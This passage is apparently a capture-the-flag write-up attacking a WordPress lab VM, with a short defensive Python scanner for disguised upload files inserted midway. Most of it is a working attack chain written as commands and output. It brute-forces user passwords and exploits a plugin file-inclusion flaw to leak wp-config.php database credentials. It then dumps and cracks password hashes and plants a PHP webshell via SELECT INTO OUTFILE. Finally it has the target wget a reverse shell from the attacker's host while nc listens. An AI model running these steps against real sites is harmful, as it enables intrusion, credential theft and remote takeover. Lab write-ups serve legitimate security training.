 |  - https://10.10.10.14:12380/blogblog/?feed=comments-rss2, <generator>http://wordpress.org/?v=4.2.1</generator>

[+] WordPress theme in use: bhost
 | Location: https://10.10.10.14:12380/blogblog/wp-content/themes/bhost/
 | Last Updated: 2019-12-08T00:00:00.000Z
 | Readme: https://10.10.10.14:12380/blogblog/wp-content/themes/bhost/readme.txt
 | [!] The version is out of date, the latest version is 1.4.4
 | Style URL: https://10.10.10.14:12380/blogblog/wp-content/themes/bhost/style.css?ver=4.2.1
 | Style Name: BHost
 | Description: Bhost is a nice , clean , beautifull, Responsive and modern design free WordPress Theme. This theme ...
 | Author: Masum Billah
 | Author URI: http://getmasum.net/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.2.9 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/themes/bhost/style.css?ver=4.2.1, Match: 'Version: 1.2.9'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating All Themes (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:00:31 <===================================> (20900 / 20900) 100.00% Time: 00:00:31
[+] Checking Theme Versions (via Passive and Aggressive Methods)

[i] Theme(s) Identified:

[+] bhost
 | Location: https://10.10.10.14:12380/blogblog/wp-content/themes/bhost/
 | Last Updated: 2019-12-08T00:00:00.000Z
 | Readme: https://10.10.10.14:12380/blogblog/wp-content/themes/bhost/readme.txt
 | [!] The version is out of date, the latest version is 1.4.4
 | Style URL: https://10.10.10.14:12380/blogblog/wp-content/themes/bhost/style.css
 | Style Name: BHost
 | Description: Bhost is a nice , clean , beautifull, Responsive and modern design free WordPress Theme. This theme ...
 | Author: Masum Billah
 | Author URI: http://getmasum.net/
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Known Locations (Aggressive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/themes/bhost/, status: 500
 |
 | Version: 1.2.9 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/themes/bhost/style.css, Match: 'Version: 1.2.9'

[+] creative-blog
 | Location: https://10.10.10.14:12380/blogblog/wp-content/themes/creative-blog/
 | Last Updated: 2020-03-01T00:00:00.000Z
 | Readme: https://10.10.10.14:12380/blogblog/wp-content/themes/creative-blog/readme.txt
 | [!] The version is out of date, the latest version is 1.1.3
 | Style URL: https://10.10.10.14:12380/blogblog/wp-content/themes/creative-blog/style.css
 | Style Name: Creative Blog
 | Style URI: http://napitwptech.com/themes/creative-blog/
 | Description: Creative Blog is an extremely creative WordPress theme to create your own personal blog site very ea...
 | Author: Bishal Napit
 | Author URI: http://napitwptech.com/themes/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/themes/creative-blog/, status: 500
 |
 | Version: 0.9 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/themes/creative-blog/style.css, Match: 'Version: 0.9'

[+] sydney
 | Location: https://10.10.10.14:12380/blogblog/wp-content/themes/sydney/
 | Last Updated: 2020-03-13T00:00:00.000Z
 | Readme: https://10.10.10.14:12380/blogblog/wp-content/themes/sydney/readme.txt
 | [!] The version is out of date, the latest version is 1.60
 | Style URL: https://10.10.10.14:12380/blogblog/wp-content/themes/sydney/style.css
 | Style Name: Sydney
 | Style URI: http://athemes.com/theme/sydney
 | Description: Sydney is a powerful business theme that provides a fast way for companies or freelancers to create ...
 | Author: aThemes
 | Author URI: http://athemes.com
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/themes/sydney/, status: 500
 |
 | Version: 1.28 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/themes/sydney/style.css, Match: 'Version: 1.28'

[+] trope
 | Location: https://10.10.10.14:12380/blogblog/wp-content/themes/trope/
 | Last Updated: 2018-06-12T00:00:00.000Z
 | Readme: https://10.10.10.14:12380/blogblog/wp-content/themes/trope/readme.txt
 | [!] The version is out of date, the latest version is 1.2
 | Style URL: https://10.10.10.14:12380/blogblog/wp-content/themes/trope/style.css
 | Style Name: Trope
 | Style URI: http://wpdean.com/trope-wordpress-theme/
 | Description: Trope is a free WordPress theme that comes with clean, modern, minimal and fully responsive design w...
 | Author: WPDean
 | Author URI: http://wpdean.com/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/themes/trope/, status: 500
 |
 | Version: 1.1.0 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/themes/trope/style.css, Match: 'Version: 1.1.0'

[+] twentyfifteen
 | Location: https://10.10.10.14:12380/blogblog/wp-content/themes/twentyfifteen/
 | Last Updated: 2020-03-31T00:00:00.000Z
 | Readme: https://10.10.10.14:12380/blogblog/wp-content/themes/twentyfifteen/readme.txt
 | [!] The version is out of date, the latest version is 2.6
 | Style URL: https://10.10.10.14:12380/blogblog/wp-content/themes/twentyfifteen/style.css
 | Style Name: Twenty Fifteen
 | Style URI: https://wordpress.org/themes/twentyfifteen/
 | Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/themes/twentyfifteen/, status: 500
 |
 | Version: 1.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/themes/twentyfifteen/style.css, Match: 'Version: 1.1'

[+] twentyfourteen
 | Location: https://10.10.10.14:12380/blogblog/wp-content/themes/twentyfourteen/
 | Last Updated: 2020-03-31T00:00:00.000Z
 | [!] The version is out of date, the latest version is 2.8
 | Style URL: https://10.10.10.14:12380/blogblog/wp-content/themes/twentyfourteen/style.css
 | Style Name: Twenty Fourteen
 | Style URI: https://wordpress.org/themes/twentyfourteen/
 | Description: In 2014, our default theme lets you create a responsive magazine website with a sleek, modern design...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/themes/twentyfourteen/, status: 500
 |
 | Version: 1.4 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/themes/twentyfourteen/style.css, Match: 'Version: 1.4'

[+] twentythirteen
 | Location: https://10.10.10.14:12380/blogblog/wp-content/themes/twentythirteen/
 | Last Updated: 2020-03-31T00:00:00.000Z
 | [!] The version is out of date, the latest version is 3.0
 | Style URL: https://10.10.10.14:12380/blogblog/wp-content/themes/twentythirteen/style.css
 | Style Name: Twenty Thirteen
 | Style URI: https://wordpress.org/themes/twentythirteen/
 | Description: The 2013 theme for WordPress takes us back to the blog, featuring a full range of post formats, each...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/themes/twentythirteen/, status: 500
 |
 | Version: 1.5 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/themes/twentythirteen/style.css, Match: 'Version: 1.5'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <=========================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] John Smith
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By: Rss Generator (Passive Detection)

[+] peter
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] john
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] elly
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] barry
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] heather
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] garry
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] harry
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] scott
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] kathy
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] tim
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Tue May 12 03:35:34 2020
[+] Requests Done: 20974
[+] Cached Requests: 52
[+] Data Sent: 5.399 MB
[+] Data Received: 3.296 MB
[+] Memory used: 276.891 MB
[+] Elapsed time: 00:00:43
For a start I tried a password-cracking attack against the users found:
```
# wpscan --disable-tls-checks --url https://10.10.10.14:12380/blogblog/ -U peter,john,elly,barry,heather,garry,harry,scott,kathy,tim -P /usr/share/wordlists/rockyou.txt
(snip)
[+] Performing password attack on Xmlrpc Multicall against 10 user/s
[SUCCESS] - garry / football
[SUCCESS] - harry / monkey
[SUCCESS] - scott / cookie
[SUCCESS] - kathy / coolgirl
^Cogress Time: 00:28:58 <                                  > (675 / 172827) 0.39%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: garry, Password: football
 | Username: harry, Password: monkey
 | Username: scott, Password: cookie
 | Username: kathy, Password: coolgirl

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Tue May 12 04:38:01 2020
[+] Requests Done: 727
[+] Cached Requests: 5
[+] Data Sent: 226.524 KB
[+] Data Received: 69.015 MB
[+] Memory used: 1.379 GB
[+] Elapsed time: 00:29:23

Scan Aborted: Canceled by User
```
It was taking too long, so I stopped it.
None of the accounts recovered was an admin, so I couldn't edit themes or anything like that.
If a vulnerable plugin turned up I felt I could make progress, but none had been found.
And then I came across this:
enumerate all plugins is not working · Issue #1222 · wpscanteam/wpscan
Huh, so without that option plugin detection can miss things.
Trying it right away:
```
# wpscan --disable-tls-checks --url https://10.10.10.14:12380/blogblog/ -e ap --plugins-detection aggressive
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.1
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

(snip)

[+] Enumerating All Plugins (via Aggressive Methods)
 Checking Known Locations - Time: 00:02:44 <===================================> (86467 / 86467) 100.00% Time: 00:02:44
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] advanced-video-embed-embed-videos-or-playlists
 | Location: https://10.10.10.14:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2015-10-14T13:52:00.000Z
 | Readme: https://10.10.10.14:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/readme.txt
 | [!] Directory listing is enabled
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/, status: 200
 |
 | Version: 1.0 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/readme.txt

[+] akismet
 | Location: https://10.10.10.14:12380/blogblog/wp-content/plugins/akismet/
 | Latest Version: 4.1.5
 | Last Updated: 2020-04-29T13:02:00.000Z
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/plugins/akismet/, status: 403
 |
 | The version could not be determined.

[+] shortcode-ui
 | Location: https://10.10.10.14:12380/blogblog/wp-content/plugins/shortcode-ui/
 | Last Updated: 2019-01-16T22:56:00.000Z
 | Readme: https://10.10.10.14:12380/blogblog/wp-content/plugins/shortcode-ui/readme.txt
 | [!] The version is out of date, the latest version is 0.7.4
 | [!] Directory listing is enabled
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/plugins/shortcode-ui/, status: 200
 |
 | Version: 0.6.2 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/plugins/shortcode-ui/readme.txt

[+] two-factor
 | Location: https://10.10.10.14:12380/blogblog/wp-content/plugins/two-factor/
 | Latest Version: 0.5.2
 | Last Updated: 2020-04-30T14:02:00.000Z
 | Readme: https://10.10.10.14:12380/blogblog/wp-content/plugins/two-factor/readme.txt
 | [!] Directory listing is enabled
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/plugins/two-factor/, status: 200
 |
 | The version could not be determined.

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Tue May 12 03:54:35 2020
[+] Requests Done: 86518
[+] Cached Requests: 13
[+] Data Sent: 23.032 MB
[+] Data Received: 11.735 MB
[+] Memory used: 404.73 MB
[+] Elapsed time: 00:03:10
```
Plugins showed up.
Searching for these four plugins: nothing for "two-factor"; "akismet" I ignored since its version couldn't be determined; and for "shortcode" none of the hits looked applicable to the installed version.
```
# searchsploit advanced video wordpress
------------------------------------------------------------------ ----------------------------------------
 Exploit Title                                                    |  Path
                                                                  | (/usr/share/exploitdb/)
------------------------------------------------------------------ ----------------------------------------
WordPress Plugin Advanced Video 1.0 - Local File Inclusion        | exploits/php/webapps/39646.py
(snip)
```
The LFI is the only way forward.
But I couldn't work out how to use this exploit script.
So I did it by hand with curl:
```
# curl -k https://10.10.10.14:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost\&title=32000\&short=rnd\&term=rnd\&thumb=../wp-config.php
https://10.10.10.14:12380/blogblog/?p=280
# curl -k https://10.10.10.14:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost\&title=32000\&short=rnd\&term=rnd\&thumb=../wp-config.php
https://10.10.10.14:12380/blogblog/?p=300
```
But all I got back was a mysterious URL.
I thought it had failed, but going back to "/blogblog/", a mysterious jpeg had been posted for each curl I ran?
I looked into where these posted items are actually stored.
They were under "/wp-content/uploads/".
Reference: [Where can I find the directory of all my posts/articles in WordPress? - Stack Overflow](https://stackoverflow.com/questions/42590267/where-can-i-find-the-directory-of-all-my-posts-articles-in-wordpress)
https://$IP:12380/blogblog/wp-content/uploads/
Accessing that URL lets you download the jpegs, so I pulled one down with curl.
```
# curl -k -O https://10.10.10.14:12380/blogblog/wp-content/uploads/463030943.jpeg
# file 463030943.jpeg
463030943.jpeg: PHP script, ASCII text
```
php?
```
# cat 463030943.jpeg
<?php
/**
 * The base configurations of the WordPress.
 *
 * This file has the following configurations: MySQL settings, Table Prefix,
 * Secret Keys, and ABSPATH. You can find more information by visiting
 * {@link https://codex.wordpress.org/Editing_wp-config.php Editing wp-config.php}
 * Codex page. You can get the MySQL settings from your web host.
 *
 * This file is used by the wp-config.php creation script during the
 * installation. You don't have to use the web site, you can just copy this file
 * to "wp-config.php" and fill in the values.
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'plbkac');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY',         'V 5p=[.Vds8~SX;>t)++Tt57U6{Xe`T|oW^eQ!mHr }]>9RX07W<sZ,I~`6Y5-T:');
define('SECURE_AUTH_KEY',  'vJZq=p.Ug,]:<-P#A|k-+:;JzV8*pZ|K/U*J][Nyvs+}&!/#>4#K7eFP5-av`n)2');
define('LOGGED_IN_KEY',    'ql-Vfg[?v6{ZR*+O)|Hf OpPWYfKX0Jmpl8zU<cr.wm?|jqZH:YMv;zu@tM7P:4o');
define('NONCE_KEY',        'j|V8J.~n}R2,mlU%?C8o2[~6Vo1{Gt+4mykbYH;HDAIj9TE?QQI!VW]]D`3i73xO');
define('AUTH_SALT',        'I{gDlDs`Z@.+/AdyzYw4%+<WsO-LDBHT}>}!||Xrf@1E6jJNV={p1?yMKYec*OI$');
define('SECURE_AUTH_SALT', '.HJmx^zb];5P}hM-uJ%^+9=0SBQEh[[*>#z+p>nVi10`XOUq (Zml~op3SG4OG_D');
define('LOGGED_IN_SALT',   '[Zz!)%R7/w37+:9L#.=hL:cyeMM2kTx&_nP4{D}n=y=FQt%zJw>c[a+;ppCzIkt;');
define('NONCE_SALT',       'tb(}BfgB7l!rhDVm{eK6^MSN-|o]S]]axl4TE_y+Fi5I-RxN/9xeTsK]#ga_9:hJ');
/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each a unique
 * prefix. Only numbers, letters, and underscores please!
 */
$table_prefix  = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 */
define('WP_DEBUG', false);

/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
	define('ABSPATH', dirname(__FILE__) . '/');

/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');
define('WP_HTTP_BLOCK_EXTERNAL', true);
```
I hadn't actually read the exploit's contents earlier, but so this is what the LFI does here.
It takes the contents of whatever file the `thumb` parameter points at and writes them into the uploads directory as a text file with a .jpeg name.
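What `file` caught on a single download can be run over the whole uploads tree. The scanner below is an added example, not code from the original post or from any tool it uses; it builds a constructed uploads directory that mirrors the artifacts on this page (a .jpeg that is really wp-config.php, a one-line shell.php, a hash dump) and flags every file whose bytes do not match what its extension claims.

```python
"""Find files under wp-content/uploads/ whose content contradicts their extension.

Added example (not from the original post). The sample tree is constructed
to mirror the artifacts this walkthrough left behind: the LFI wrote
wp-config.php out under a .jpeg name, and `file` reported it as
"PHP script, ASCII text". This scanner repeats that check for a whole tree.
"""
import os
import re
import tempfile
from typing import List, Optional, Tuple

# Leading bytes that genuine image files start with.
IMAGE_MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
# Server-side script extensions that have no business in an uploads tree.
SCRIPT_EXTENSIONS = {".php", ".phtml", ".php5", ".phar"}
PHP_OPEN_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def classify(name: str, data: bytes) -> Optional[str]:
    """Return a reason string if the file looks suspicious, else None."""
    ext = os.path.splitext(name)[1].lower()
    head = data[:4096]
    if ext in SCRIPT_EXTENSIONS:
        return "server-side script in uploads"
    if ext in IMAGE_MAGIC:
        if not any(head.startswith(magic) for magic in IMAGE_MAGIC[ext]):
            return f"extension {ext} but no image magic bytes"
        if PHP_OPEN_TAG.search(data):
            # Valid image header followed by PHP: a polyglot, not a photo.
            return "image with embedded PHP open tag"
        return None
    if PHP_OPEN_TAG.search(head):
        return "PHP open tag in non-script file"
    return None


def scan_uploads(root: str) -> List[Tuple[str, str]]:
    """Walk an uploads tree and collect (relative path, reason) pairs."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for filename in files:
            full = os.path.join(dirpath, filename)
            with open(full, "rb") as fh:
                data = fh.read()
            reason = classify(filename, data)
            if reason:
                findings.append((os.path.relpath(full, root), reason))
    return sorted(findings)


def build_sample_tree() -> str:
    """Create a constructed uploads directory mirroring the artifacts above."""
    root = tempfile.mkdtemp(prefix="uploads-")
    samples = {
        # wp-config.php copied out under a .jpeg name by the plugin.
        "463030943.jpeg": b"<?php\n/** The base configurations of the WordPress. */\n"
                          b"define('DB_NAME', 'wordpress');\n",
        # A minimal genuine JPEG header: must not be flagged.
        "2016/06/photo.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32,
        # The one-line webshell written with SELECT ... INTO OUTFILE.
        "shell.php": b"<?php passthru($_GET['cmd']); ?>\n",
        # Hash dump written the same way: not PHP, not an image either.
        "passwd.txt": b"John:$P$B7889EMq/erHIuZapMB8GEizebcIy9.\n",
    }
    for rel, body in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for rel, why in scan_uploads(build_sample_tree()):
        print(f"{rel}: {why}")
```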
Anyway, thanks to "wp-config.php" it looks like I can get into MySQL.
The goal is to log in to WordPress as admin and deface a page.
```
# mysql -h 10.10.10.14 -u root -p
Enter password:
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 945
Server version: 5.7.12-0ubuntu1 (Ubuntu)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL > show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| loot               |
| mysql              |
| performance_schema |
| phpmyadmin         |
| proof              |
| sys                |
| wordpress          |
+--------------------+
8 rows in set (0.001 sec)

MySQL > use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [wordpress]> show tables;
+-----------------------+
| Tables_in_wordpress   |
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+
11 rows in set (0.001 sec)

MySQL [wordpress]> select * from wp_users;
+----+------------+------------------------------------+---------------+-----------------------+------------------+---------------------+---------------------+-------------+-----------------+
| ID | user_login | user_pass                          | user_nicename | user_email            | user_url         | user_registered     | user_activation_key | user_status | display_name    |
+----+------------+------------------------------------+---------------+-----------------------+------------------+---------------------+---------------------+-------------+-----------------+
|  1 | John       | $P$B7889EMq/erHIuZapMB8GEizebcIy9. | john          | john@red.localhost    | http://localhost | 2016-06-03 23:18:47 |                     |           0 | John Smith      |
|  2 | Elly       | $P$BlumbJRRBit7y50Y17.UPJ/xEgv4my0 | elly          | Elly@red.localhost    |                  | 2016-06-05 16:11:33 |                     |           0 | Elly Jones      |
|  3 | Peter      | $P$BTzoYuAFiBA5ixX2njL0XcLzu67sGD0 | peter         | peter@red.localhost   |                  | 2016-06-05 16:13:16 |                     |           0 | Peter Parker    |
|  4 | barry      | $P$BIp1ND3G70AnRAkRY41vpVypsTfZhk0 | barry         | barry@red.localhost   |                  | 2016-06-05 16:14:26 |                     |           0 | Barry Atkins    |
|  5 | heather    | $P$Bwd0VpK8hX4aN.rZ14WDdhEIGeJgf10 | heather       | heather@red.localhost |                  | 2016-06-05 16:18:04 |                     |           0 | Heather Neville |
|  6 | garry      | $P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1 | garry         | garry@red.localhost   |                  | 2016-06-05 16:18:23 |                     |           0 | garry           |
|  7 | harry      | $P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0 | harry         | harry@red.localhost   |                  | 2016-06-05 16:18:41 |                     |           0 | harry           |
|  8 | scott      | $P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1 | scott         | scott@red.localhost   |                  | 2016-06-05 16:18:59 |                     |           0 | scott           |
|  9 | kathy      | $P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0 | kathy         | kathy@red.localhost   |                  | 2016-06-05 16:19:14 |                     |           0 | kathy           |
| 10 | tim        | $P$BXDR7dLIJczwfuExJdpQqRsNf.9ueN0 | tim           | tim@red.localhost     |                  | 2016-06-05 16:19:29 |                     |           0 | tim             |
| 11 | ZOE        | $P$B.gMMKRP11QOdT5m1s9mstAUEDjagu1 | zoe           | zoe@red.localhost     |                  | 2016-06-05 16:19:50 |                     |           0 | ZOE             |
| 12 | Dave       | $P$Bl7/V9Lqvu37jJT.6t4KWmY.v907Hy. | dave          | dave@red.localhost    |                  | 2016-06-05 16:20:09 |                     |           0 | Dave            |
| 13 | Simon      | $P$BLxdiNNRP008kOQ.jE44CjSK/7tEcz0 | simon         | simon@red.localhost   |                  | 2016-06-05 16:20:35 |                     |           0 | Simon           |
| 14 | Abby       | $P$ByZg5mTBpKiLZ5KxhhRe/uqR.48ofs. | abby          | abby@red.localhost    |                  | 2016-06-05 16:20:53 |                     |           0 | Abby            |
| 15 | Vicki      | $P$B85lqQ1Wwl2SqcPOuKDvxaSwodTY131 | vicki         | vicki@red.localhost   |                  | 2016-06-05 16:21:14 |                     |           0 | Vicki           |
| 16 | Pam        | $P$BuLagypsIJdEuzMkf20XyS5bRm00dQ0 | pam           | pam@red.localhost     |                  | 2016-06-05 16:42:23 |                     |           0 | Pam             |
+----+------------+------------------------------------+---------------+-----------------------+------------------+---------------------+---------------------+-------------+-----------------+
16 rows in set (0.001 sec)
```
Since the WordPress password hashes can be pulled out this way, I write them to a file in a format a password cracker can read.
```
MySQL [wordpress]> select concat_ws(':', user_login, user_pass) from wp_users into outfile '/var/www/https/blogblog/wp-content/uploads/passwd.txt';
Query OK, 16 rows affected (0.010 sec)
```

```
# curl -k https://10.10.10.14:12380/blogblog/wp-content/uploads/passwd.txt
John:$P$B7889EMq/erHIuZapMB8GEizebcIy9.
Elly:$P$BlumbJRRBit7y50Y17.UPJ/xEgv4my0
Peter:$P$BTzoYuAFiBA5ixX2njL0XcLzu67sGD0
barry:$P$BIp1ND3G70AnRAkRY41vpVypsTfZhk0
heather:$P$Bwd0VpK8hX4aN.rZ14WDdhEIGeJgf10
garry:$P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1
harry:$P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0
scott:$P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1
kathy:$P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0
tim:$P$BXDR7dLIJczwfuExJdpQqRsNf.9ueN0
ZOE:$P$B.gMMKRP11QOdT5m1s9mstAUEDjagu1
Dave:$P$Bl7/V9Lqvu37jJT.6t4KWmY.v907Hy.
Simon:$P$BLxdiNNRP008kOQ.jE44CjSK/7tEcz0
Abby:$P$ByZg5mTBpKiLZ5KxhhRe/uqR.48ofs.
Vicki:$P$B85lqQ1Wwl2SqcPOuKDvxaSwodTY131
Pam:$P$BuLagypsIJdEuzMkf20XyS5bRm00dQ0
```
I dumped everyone's hash, but judging by the ID, john looks like the admin, so cracking only john's password should be enough.
```
# curl -k https://10.10.10.14:12380/blogblog/wp-content/uploads/passwd.txt | grep John > pass
# john --wordlist=/usr/share/wordlists/rockyou.txt pass
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
incorrect        (John)
1g 0:00:00:12 DONE (2020-05-12 06:04) 0.07961g/s 14721p/s 14721c/s 14721C/s ipod22..iloveafi
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed
```
With that I could log in to WordPress with admin privileges, so as usual I go to Appearance -> Editor and rewrite whatever theme file I like.
This time I'll rewrite "404.php".
Replace the whole of "404.php" with "/usr/share/webshells/php/php-reverse-shell.php".
```
# cp /usr/share/webshells/php/php-reverse-shell.php reverse.php
# vim reverse.php
```
Or so I thought, but this WordPress apparently doesn't allow editing themes.
Why?
Switching plans: plant a webshell through MySQL instead.
Planting the webshell:
```
# mysql -h 10.10.10.14 -u root -p
Enter password:
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 1013
Server version: 5.7.12-0ubuntu1 (Ubuntu)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> select "<?php passthru($_GET['cmd']); ?>" into outfile '/var/www/https/blogblog/wp-content/uploads/shell.php';
Query OK, 1 row affected (0.001 sec)
```
Have the target download the reverse shell:
window 1
```
# python -m SimpleHTTPServer 80
```

window 2
```
# curl -k https://10.10.10.14:12380/blogblog/wp-content/uploads/shell.php?cmd=wget+10.10.10.3/reverse.php
```

window 1
```
# nc -nlvp 8080
```

window 2
```
curl -k https://10.10.10.14:12380/blogblog/wp-content/uploads/reverse.php
